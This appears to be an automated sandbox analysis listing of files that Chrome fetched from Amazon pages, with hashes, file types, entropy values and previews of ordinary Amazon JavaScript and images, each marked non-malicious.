                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:JZJKZTDKNV2CKC82BW2M$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.294992.0%26id%3DJZJKZTDKNV2CKC82BW2M%26sc0%3Daui%3Asw%3Appft%3Acallback_ricb%26bb0%3D1944%26pc0%3D2760%26ld0%3D2760%26t0%3D1723469047082%26sc1%3Dportal-bb%26pc1%3D13%26ld1%3D13%26t1%3D1723469046298%26sc2%3DjQueryReady%26cf2%3D2033%26pc2%3D2033%26ld2%3D2033%26t2%3D1723469046355%26sc3%3DheroAf%26cf3%3D2189%26pc3%3D2189%26ld3%3D2189%26t3%3D1723469046511%26sc4%3Dgateway-asset-load%26cf4%3D2470%26pc4%3D2470%26ld4%3D2470%26t4%3D1723469046792%26sc5%3Dh1Af%26cf5%3D2473%26pc5%3D2473%26ld5%3D2473%26t5%3D1723469046795%26sc6%3Ddesktop-grid-1-visible%26cf6%3D2476%26pc6%3D2476%26ld6%3D2476%26t6%3D1723469046798%26sc7%3Ddesktop-grid-2-visible%26cf7%3D2476%26pc7%3D2476%26ld7%3D2476%26t7%3D1723469046798%26sc8%3Ddesktop-grid-3-visible%26cf8%3D2478%26pc8%3D2478%26ld8%3D2478%26t8%3D1723469046800%26sc9%3Ddesktop-grid-4-visible%26cf9%3D2479%26pc9%3D2479%26ld9%3D2479%26t9%3D1723469046801%26sc10%3Ddesktop-grid-5-visible%26cf10%3D2480%26pc10%3D2480%26ld10%3D2480%26t10%3D1723469046802%26sc11%3Ddesktop-grid-6-visible%26cf11%3D2481%26pc11%3D2481%26ld11%3D2481%26t11%3D1723469046803%26sc12%3Ddesktop-grid-7-visible%26cf12%3D2482%26pc12%3D2482%26ld12%3D2482%26t12%3D1723469046804%26sc13%3Ddesktop-grid-8-visible%26cf13%3D2482%26pc13%3D2482%26ld13%3D2482%26t13%3D1723469046804%26sc14%3DspLoadJs%26cf14%3D2510%26pc14%3D2510%26ld14%3D2510%26t14%3D1723469046832%26sc15%3Ddesktop-1-visible%26cf15%3D2521%26pc15%3D2521%26ld15%3D2521%26t15%3D1723469046843%26sc16%3Ddesktop-btf-grid-1-visible%26cf16%3D2527%26pc16%3D2527%26ld16%3D2527%26t16%3D1723469046849%26sc17%3Dgw-ftGr-desktop-hero-1-visible%26cf17%3D2527%26pc17%3D2527%26ld17%3D2527%26t17%3D1723469046849%26sc18%3DgwGridInit%26cf18%3D2557%26pc18%3D2557%26ld18%3D2557%26t18%3D1723469046879%26sc19%3DnavCF%26cf19%3D2565%26pc19%3D2565%26ld19%3D2565%26t19%3D1723469046887%26sc20%3Ddesktop-btf-grid-2-visible%26cf20%3D2571%26pc20%3D2571%26ld20%3D2571%26t20%3D1723469046893%26sc21%3Ddesktop-btf-grid-3-visible%26cf21%3D2572%26pc21%3D2572%26ld21%3D2572%26t21%3D1723469046894%26sc22%3Ddesktop-btf-grid-4-visible%26cf22%3D2575%26pc22%3D2575%26ld22%3D2575%26t22%3D1723469046897%26sc23%3Ddesktop-3-visible%26cf23%3D2577%26pc23%3D2577%26ld23%3D2577%26t23%3D1723469046899%26sc24%3Ddesktop-4-visible%26cf24%3D2580%26pc24%3D2580%26ld24%3D2580%26t24%3D1723469046902%26sc25%3Ddesktop-btf-grid-5-visible%26cf25%3D2607%26pc25%3D2607%26ld25%3D2607%26t25%3D1723469046929%26sc26%3Ddesktop-btf-grid-6-visible%26cf26%3D2607%26pc26%3D2607%26ld26%3D2607%26t26%3D1723469046929%26sc27%3Ddesktop-btf-grid-7-visible%26cf27%3D2609%26pc27%3D2609%26ld27%3D2609%26t27%3D1723469046931%26sc28%3Ddesktop-btf-grid-8-visible%26cf28%3D2610%26pc28%3D2610%26ld28%3D2610%26t28%3D1723469046932%26sc29%3Ddesktop-5-visible%26cf29%3D2612%26pc29%3D2612%26ld29%3D2612%26t29%3D1723469046934%26sc30%3Ddesktop-6-visible%26cf30%3D2615%26pc30%3D2615%26ld30%3D2615%26t30%3D1723469046937%26sc31%3Ddesktop-btf-grid-9-visible%26cf31%3D2617%26pc31%3D2617%26ld31%3D2617%26t31%3D1723469046939%26sc32%3Ddesktop-btf-grid-10-visible%26cf32%3D2635%26pc32%3D2635%26ld32%3D2635%26t32%3D1723469046957%26sc33%3Ddesktop-btf-grid-11-visible%26cf33%3D2636%26pc33%3D2636%26ld33%3D2636%26t33%3D1723469046958%26sc34%3Ddesktop-btf-grid-12-visible%26cf34%3D2637%26pc34%3D2637%26ld34%3D2637%26t34%3D1723469046959%26sc35%3Ddesktop-7-visible%26cf35%3D2639%26pc35%3D2639%26ld35%3D2639%26t35%3D1723469046961%26sc36%3DcsmCELLSframework%26bb36%3D2685%26pc36%3D2685%26ld36%3D2685%26t36%3D1723469047007%26sc37%3DcsmCELLSpdm%26bb37%3D2685%26pc37%3D2695%26ld37%3D2695%26t37%3D1723469047017%26sc38%3DcsmCELLSvpm%26bb38%3D2695%26pc38%3D2695%26ld38%3D2695%26t38%3D1723469047017%26sc39%3DcsmCELLSfem%26bb39%3D2695%26pc39%3D2695%26ld39%3D2695%26t39%3D1723469047017%26sc40%3Due_sushi_v1%26bb40%3D2696%26pc40%3D2696%26ld40%3D2696%26t40%3D1723469047018%26sc41%3DgwBTFGridInit%26cf41%3D2703%26pc41%3D2703%26ld41%3D2703%26t41%3D1723469047025%26sc42%3Dadplacements%3AsfImpression%3Ab73e766d-3a78-4209-bde9-93efa566562d%26bb42%3D2736%26pc42%3D4075%26ld42%3D4059%26t42%3DMon%20Aug%2012%202024%2009%3A24%3A08%20GMT-0400%20(Eastern%20Daylight%20Time)%26sc43%3Dadplacements%3AsfImpression%3AGateway%3Aright-7%3Adesktop%26bb43%3D2736%26pc43%3D4075%26ld43%3D4059%26t43%3DMon%20Aug%2012%202024%2009%3A24%3A08%20GMT-0400%20(Eastern%20Daylight%20Time)%26sc44%3DjQueryDomReady%26cf44%3D2750%26pc44%3D2750%26ld44%3D2750%26t44%3D1723469047072%26sc45%3Ddesktop-1-active%26cf45%3D2750%26pc45%3D2750%26ld45%3D2750%26t45%3D1723469047072%26sc46%3Ddesktop-3-active%26cf46%3D2750%26pc46%3D2750%26ld46%3D2750%26t46%3D1723469047072%26sc47%3Ddesktop-4-active%26cf47%3D2750%26pc47%3D2750%26ld47%3D2750%26t47%3D1723469047072%26sc48%3Ddesktop-5-active%26cf48%3D2750%26pc48%3D2750%26ld48%3D2750%26t48%3D1723469047072%26sc49%3Ddesktop-6-active%26cf49%3D2750%26pc49%3D2750%26ld49%3D2750%26t49%3D1723469047072%26sc50%3Ddesktop-7-active%26cf50%3D2750%26pc50%3D2750%26ld50%3D2750%26t50%3D1723469047072%26sc51%3Daui%3Asw%3Apage_proxy%3Arequest_feature_tags%26bb51%3D2760%26pc51%3D7016%26ld51%3D7016%26t51%3D1723469051338%26sc52%3Dhero-first-image%26cf52%3D3464%26pc52%3D3464%26ld52%3D3464%26t52%3D1723469047786%26sc53%3DgwLayoutReady%26cf53%3D3487%26pc53%3D3487%26ld53%3D3487%26t53%3D1723469047809%26sc54%3DgwAUIReady%26cf54%3D3502%26pc54%3D3502%26ld54%3D3502%26t54%3D1723469047824%26sc55%3Dgw-hero-btf-populate%26cf55%3D3570%26pc55%3D3570%26ld55%3D3570%26t55%3D1723469047892%26sc56%3DgwHerotatorActive%26cf56%3D3591%26pc56%3D3591%26ld56%3D3591%26t56%3D1723469047913%26sc57%3Dgw-ftGr-desktop-hero-5-visible%26cf57%3D3823%26pc57%3D3823%26ld57%3D3823%26t57%3D1723469048145%26sc58%3Dgw-ftGr-desktop-hero-2-visible%26cf58%3D4161%26pc58%3D4161%26ld58%3D4161%26t58%3D1723469048483%26sc59%3Dgw-ftGr-desktop-hero-3-visible%26cf59%3D4162%26pc59%3D4162%26ld59%3D4162%26t59%3D1723469048484%26sc60%3Dgw-ftGr-desktop-hero-6-visible%26cf60%3D5580%26pc60%3D5580%26ld60%3D5580%26t60%3D1723469049902%26sc61%3Dgw-ftGr-desktop-hero-4-visible%26cf61%3D5652%26pc61%3D5652%26ld61%3D5652%26t61%3D1723469049974%26ctb%3D1:16604
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1164)
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):92645
                                                                                                                                                                                                                                                                Entropy (8bit):5.499399861609263
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:1536:itJNHcV33MPumIN9qk+qC/qgKqJzqdG2utW:4HcZ5N4kPCig7JWdG2/
                                                                                                                                                                                                                                                                MD5:1F84CAEFF1DB535A91E3CC2643E9A461
                                                                                                                                                                                                                                                                SHA1:5E3B28E14EEFDF42C397EC5CF8A33D0EC48CC646
                                                                                                                                                                                                                                                                SHA-256:55100CBFC780DFF9D1926582C758DC86391F6AA64FEF58EA45DA566CAF8EA469
                                                                                                                                                                                                                                                                SHA-512:EC9836CD76272C2035C93528D985286C1D8AC7B82B88E592529C44223CF97FA8A4626802BE0B90595A9A41A748F1FDA597517DE937C96FC3BA386074F28EC46B
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:(function(t){var h=window.AmazonUIPageJS||window.P,k=h._namespace||h.attributeErrors,M=k?k("SocialShareWidgetAUI","AmazonUI"):h;M.guardFatal?M.guardFatal(t)(M,window):M.execute(function(){t(M,window)})})(function(t,h,k){function M(e){if(Array.isArray(e)){for(var k=0,h=Array(e.length);k<e.length;k++)h[k]=e[k];return h}return Array.from(e)}"use strict";"use strict";t.register("SocialShareWidget",function(){var e;(function(){var k={353:function(e,a,n){Object.defineProperty(a,"__esModule",{value:!0});.var c=n(905),b=n(738);e=function(){function a(){var c=this;this.generateTimestampCollection=function(){var a=(new Date).getTimezoneOffset();a=c.getDateTimeByOffset(a);var d=c.getDateTimeByOffset(0);return{hitDay:a.split("T")[0],hitDatetime:a,hitDatetimeUtc:d}};this.getMarketplaceId=function(a){return"string"==typeof a?a:h.ue&&h.ue.mid?h.ue.mid:b.CSA_DEFAULT_VALUE.string};var d=this.generateTimestampCollection();this.csaMetricsData={schemaId:a.CSA_SCHEMA_ID,userAgentId:b.CSA_DEFAULT_VALUE.numb
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 154x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):8742
                                                                                                                                                                                                                                                                Entropy (8bit):7.955410952647154
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:YekbPqRwDWR6QZX+B96Y4HKsWvK7la7+GvkMLtl0:YBbPqSSR/+B9GKHviox8
                                                                                                                                                                                                                                                                MD5:57AE745334A9A96713987613FC8AD823
                                                                                                                                                                                                                                                                SHA1:EDF57EAAF9A696B830F842A7A82C7EF8DD502C1B
                                                                                                                                                                                                                                                                SHA-256:68B9A924DB6B0A4594E8D7A0DE8137F8849A43AF36D297F0ECEEF4F1370D8548
                                                                                                                                                                                                                                                                SHA-512:C4C278D9B2624AC4E19CA8FA825C9472A5796D477A23D89A2EA6CBDF43B971E311740E96390E0CC404D97B56113B7DD94CA65A76DEC964C605EAFFD272FEB273
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...................................................................!"1AQT...#2Rq.....au..3457st.$6BDEU....................................................!1.AQ.."...2aq....3R.#BCb............?...R..S.)JR"..")JR"..")J.vm. .z....;.W=~O...N'.`.u.Z.....a....2.J....^;...Z.{.V.dw>ke.H...#.L..T.~.ma.:n..8.. 2.1.;."......q"`.L..X{N...-.).VP..Q.L...K.H..;.K...A?....7......{..vh.....dZ"!u.H..*?..).C..=.G)~Z.8.+k....l...v.r..r..e...;..S....+,9R@I8,..xKP..{q.iz...qK...)...,..2R..Qs.t.=\....Br..8..U..+.k..).JR...).JR...).R.....V..k.-z}Q.b.'..$o.n......}J.*+J....N.I.n-/.m.[....n.w.h.V.%x./.K.Vl$./.........t..W#.X.Z..;.....D.....Rl..Fk.c.].........W..H.n..l..>.i.w#i?..n...<.N.}n.'.=..+.....R.=..5...m2Id.O.. ..5.......I....y.0uK.....X...o...+~i....&..Q.._(.......n......k.t.[XF....s.B...2....q..im.L....4..u|..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (609)
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):26743
                                                                                                                                                                                                                                                                Entropy (8bit):5.347138627237308
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:f1It/R8qLTNor9iviwO2AMVdnjnTzyFVBIXO6ZkLvnP7w2VxLQ/E2pNeHmnqjUYR:acmgkJVd/zMV56ZkLvxVx8fXoKA
                                                                                                                                                                                                                                                                MD5:ABC38D8868C37FAF892916C89A4E5FBC
                                                                                                                                                                                                                                                                SHA1:469738064CD0AEABAE8B4DAA2B679B587310134A
                                                                                                                                                                                                                                                                SHA-256:FA8ED1F8E3AE60AB5AE81058050107B99A2AE4E5A34192BBAE3E41D35EC2693F
                                                                                                                                                                                                                                                                SHA-512:158840D371AF384897DC3E11E2634F35FEFC895756A31CD4CFAE91325561EFF5CAF5CD4F125A16642BCD2AE6D5073467BF5390B63704A3DC84ED8525FB84C4BC
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/I/11y85pohsPL._RC%7C41JZmnaIUdL.js_.js?AUIClients/AmazonGatewayAuiAssets
                                                                                                                                                                                                                                                                Preview:(function(e){var k=window.AmazonUIPageJS||window.P,l=k._namespace||k.attributeErrors,f=l?l("AmazonHomepageCardAssets",""):k;f.guardFatal?f.guardFatal(e)(f,window):f.execute(function(){e(f,window)})})(function(e,k,l){e.register("gw-video-orchestrator",function(){function f(a,b,g){return 0<a?Math.min(g-a,b-a):0<b?Math.min(b,g):0}function n(a){var b=k.innerHeight||document.documentElement.clientHeight,g=k.innerWidth||document.documentElement.clientWidth;a=a.getBoundingClientRect();var b=f(a.top,a.bottom,.b),g=f(a.left,a.right,g),c=0;if(0<b||0<g)c=b*g;return Math.min(1,Math.max(0,c/((a.bottom-a.top)*(a.right-a.left))))}function p(a,b){return a&&1===a.nodeType&&(a.offsetWidth||a.offsetHeight||a.getClientRects().length)?n(a)<b?!1:!0:!1}function m(a){a=q(a);a!==c&&(c&&c.callback(!1),(c=a)&&"hidden"!==document.visibilityState&&c.callback(!0))}function q(a){if(a)for(var b=d.length;b--;)if(d[b].element===a)return d[b]}function r(a,b){return b.priority-a.priority||n(b.element)-n(a.element)||(a.el
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2644
                                                                                                                                                                                                                                                                Entropy (8bit):7.8013450208110955
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0r9QSXKxMDnY/xqNs8/IVVc8DSnii/DFQHzvEMdyFXjlgRIQe+O+ISQ7c:TLSm6nQZVVVc8+nii/DFQHLEqyhlhL+B
                                                                                                                                                                                                                                                                MD5:47018558181AAF349CB0496621E804C3
                                                                                                                                                                                                                                                                SHA1:A6414121345FEC74AC5BDA681EBBED2C6BE21BA6
                                                                                                                                                                                                                                                                SHA-256:F4862A1FDD9F625C96C03EB43E5738DD5917C6A8A8EB34F8880952312DC775A3
                                                                                                                                                                                                                                                                SHA-512:9611E2AB07B4DD2955CF8C6257ED2489E669F0B6D242864741F9C77FA4AC053AFC57698C94C5A7DE9AB69E920BD2061A9916E352F89C45D1A6B60C705C2DFEC2
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."................................................................!1."AQ.#2a..Rq....%3b..Br..................................................!"..1Aa............?...........1.q.6M..........2"@....4.V.).9...R&.;.7.cc.}9G$.......wT..-..D.p...\[I.O.w@9.o-....."K`""." ""." ""."cf..M......%......E|3..$...%5~.#~..T.g>.J+.:...M.dXnbz..y...(.I....qv_.hFJ*...)}.....`.m..Q..>O.)e..R.....4..d.*S.I....'A.Z&U..^..z...r;..1...b.uW...Y.5...`\t&w._+....}.E@.............=E...h..Y..WF..mw.1...U..V....X>..o.-7....2............u...T....u.3]/.dxy;lw..u...{.&|..-.^.F........Nu5d.z.P..................J..7.1.7..q\*..z6A.o..+;..k.L.4...V..Ptb..}.W.......oE...E=..v...#..k\F..;O..E.*...Q......~...r.E.........D...9\+.rqX;.,>.Z7.........mz....e..U.X......XnO...Lr4..q.V....~E.-.t9G....7~.;...._.p.~b.v}._f.$SL.j..3S..;...
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (6950)
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):277558
                                                                                                                                                                                                                                                                Entropy (8bit):5.4522431845380135
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6144:rSxdJugNsSaR9jfmndXT3qVmAxkGxwFsDcOWQdAhZe9yzy6HoOU+/nr1TiYj7rqk:rSxdJugNsSyfmndXT3qVmAxkGxwFsDcx
                                                                                                                                                                                                                                                                MD5:6F4AC66FB42D451C78F6DBD80D3093E7
                                                                                                                                                                                                                                                                SHA1:A5519532768AD88614DFECFD1E676D250C471668
                                                                                                                                                                                                                                                                SHA-256:1C9564FC6E4C8D6C8BB60ED2EAD1ADFF198F697AD56D6D0D5848AEB60E9F9107
                                                                                                                                                                                                                                                                SHA-512:B4DEBD5AF74DBB0F6F66A35E0C0748EEDB99E74A8DFB2B1974214A2CD43B93F499BD9C858EC807AFD71CBBC97E9227712D0397A54D199C3E3A5054AAF7E24CE9
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:////////////////////////////////////////////.;(function (packageFunction) {. /* istanbul ignore next */. var p = window.AmazonUIPageJS || window.P;. /* istanbul ignore next */. var attribute = p._namespace || p.attributeErrors;. /* istanbul ignore next */. var namespacedP = attribute ? attribute("FWCIMAssets", "") : p;.. /* istanbul ignore next */. if (namespacedP.guardFatal) {. namespacedP.guardFatal(packageFunction)(namespacedP, window);. } else {. namespacedP.execute(function () {. packageFunction(namespacedP, window);. });. }.}(function(P, window, undefined){.// BEGIN ASSET FWCIMAssets - 4.0./////////////////////////.// BEGIN FILE src/js/fwcim.js./////////////////////////./*...Full source (including license, if applicable) included below..*/./******/ (function(modules) { // webpackBootstrap./******/ .// The module cache./******/ .var installedModules = {};./******/./******/ .// The require function./******/ .function __webpack_require__(moduleId) {./******/.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 3000x1200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):147587
                                                                                                                                                                                                                                                                Entropy (8bit):7.413324190072989
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3072:NNmoSlRkzlkCpuIY78pLyMOh8lSjb+bFETmpJVG:C9kzyCphpLyMO3jbEF0eJVG
                                                                                                                                                                                                                                                                MD5:B6ABB9E8CA094B6421F93430355DD50B
                                                                                                                                                                                                                                                                SHA1:599D8A7861DD5BB030FEF780DA2F32CF13982AE8
                                                                                                                                                                                                                                                                SHA-256:2A7DCBB26F9FA38C140F06924E6780A169F6BF8E4CC084844BEF249168879A5B
                                                                                                                                                                                                                                                                SHA-512:0581D5F5BCF41865523BCF3993FD285E83BDB9DA2637300362221F82D6A0784543DA94505C98CCD485BF484194E2D1064E382EC33E6A866CF0D56770CD81C71B
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......Exif..II*.................Ducky..............http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:a5ecbaa6-ca8a-48b3-9ab9-0568866a55c5" xmpMM:DocumentID="xmp.did:5DB9079E4C1511EF856A94285C069192" xmpMM:InstanceID="xmp.iid:5DB9079D4C1511EF856A94285C069192" xmp:CreatorTool="Adobe Photoshop 25.11 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:436fb9fc-aa5c-4a95-a409-6aae293d594f" stRef:documentID="adobe:docid:photoshop:e65d89a6-917f-e949-b271-9d2c7c650dc3"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d.........................!..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x160, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1933
                                                                                                                                                                                                                                                                Entropy (8bit):7.206803405960611
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0rhhKeAY5AzP6qNpdhUeoBk1tjl41zLGCjF:TeL5OP6wLboBktj21ljF
                                                                                                                                                                                                                                                                MD5:F145D0A5A46CDE00B2E8D004E4746156
                                                                                                                                                                                                                                                                SHA1:8813828E1EC121491E5914898AE3F48F57B8AC73
                                                                                                                                                                                                                                                                SHA-256:4D60B213703FB63DD25C81AA4CD59BE5F3ED666F4A44066CA7AC05D5FD1421FB
                                                                                                                                                                                                                                                                SHA-512:A4037153D62E85D66054ABC0568451863ECCA6B84CB7E1F088883473A1632CFDD39A2F682F7FF86064EB3E6FEF1E2C769A7EE81797C1C21BB6D8CB0DC5D76FDF
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*...........".............................................................!1.A..2QRa..."#Bb..4..3q.............................................1.!a..2Qq.Ar....4bc..............?.......[.3jk...P.4..E....i..(O..o..6Zf.[..u.[p.\..g..D.%....~...>..r..d6..6...yr.5.\.l....q.I.x.............................h7>...Xs..]..k.K.DGg.l.L..5..UK.o}...u......#[.hS.1.y..).T.J.]WR....Wv..Vk.e...'...%..en.ef../.?.~5._.....O.E.cXg|6.i...*.......................... ..g=j5e......M.q.,..}..r.(......{u...Y/+../....!....t|.2..Y...+...$.3..zO.V.#.CwS....^..?V...T...2BZ-....c.-5....@.............................yZ^W.........9...D.lnlM....g......K..Rn.'+h.K^. .L....]..8|.I...6t.c=c..{W.I.}..<......S..?^.WG.;....4z..&'I............................T.Mr..Sz.%..'..A.M..F:.%...03h...y.+.).k.i._D/..*Q.i..M>.2....k......>..$...3.O.t..?.?.....P*
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:PNG image data, 400 x 900, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):16237
                                                                                                                                                                                                                                                                Entropy (8bit):7.914373477606932
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:uZUkQ4lr5sLQMaphjMr2VqWT33ZoXgsICdjyt8bpBXG8OfQwZop96OJ+CTy5:ui4B0arXq8ygCdjTHWfQ8opRpy5
                                                                                                                                                                                                                                                                MD5:52B8D386D2B1D407C71A4AE966B61ADD
                                                                                                                                                                                                                                                                SHA1:B962650FFFC15637F0D9F57C332702459F084B7B
                                                                                                                                                                                                                                                                SHA-256:D47C1E50DB91BB597B75EDC63362CD0C568E4F5F15A3F8BE1B6ADFF24E89E447
                                                                                                                                                                                                                                                                SHA-512:C6B69AF93D0683324A86CBEE5575E42A293C8588267C49034D1CC9AB3635034897838F9D5EA665B694C90D72CFE2B3F462CAD907CC74749E9AF863A90D233998
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:.PNG........IHDR................Z....gAMA......a.....sRGB.........PLTE....j..j.....i....fJ.nU.....i.....j..j............._bg[ajD`e.k..j..i.. ..i....\..i."'+.j.......j....................i.&+1otzMT[.i..........NSZbgl.i.jpw..E.... ...HOW.....j....bde...KQY........OTS344^ch....j.........adh............2.....eefZ`f.j.......{..{..ejr..........s.........i...biq`fnOSY....................fff.....f...........w.!!!fff...bhp.u..u..Y.'..PUY.....488.u.588.H.........F..............c.../.....tz.............1.................J.!!!..c.l.......q.m..v;d..D..Vx..../8A......#*1/8@.....\333...`gofffPW`.....%......KR[]dl.u.dkr.....dT[dX_g............kqx................7>A.].......Y..<........+4>.j..................}..UUU......?GP.{.............uK....7.'..rx~..R../~.....y.s.....%....W.........t...Y.{{I...YY...........tRNS.A4............b.H..[eo6..'..Q.......Q....a.w...`....w.a.A.5...q/.{I...e..X.^.......p....q..~......R.w...6........Gc........|......Z......
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:PNG image data, 449 x 153, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):36621
                                                                                                                                                                                                                                                                Entropy (8bit):7.983316536326704
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:Cczx7gHj7LLZ8BsDLnyV5BF51PT/Zi1EGd9ZhJbJrV3dZh2Ph1OAallR:CczxED7fYKijF5h41FhJ73gzg9
                                                                                                                                                                                                                                                                MD5:C78CEFFDF6E5E1A7F25017EB451176CB
                                                                                                                                                                                                                                                                SHA1:A9F0FA9D4E21B61851475A1489441185F6F07AC9
                                                                                                                                                                                                                                                                SHA-256:9847E6EDC1FCD90A56FEA0D3491518B961DD11AA6B5680238714965679982558
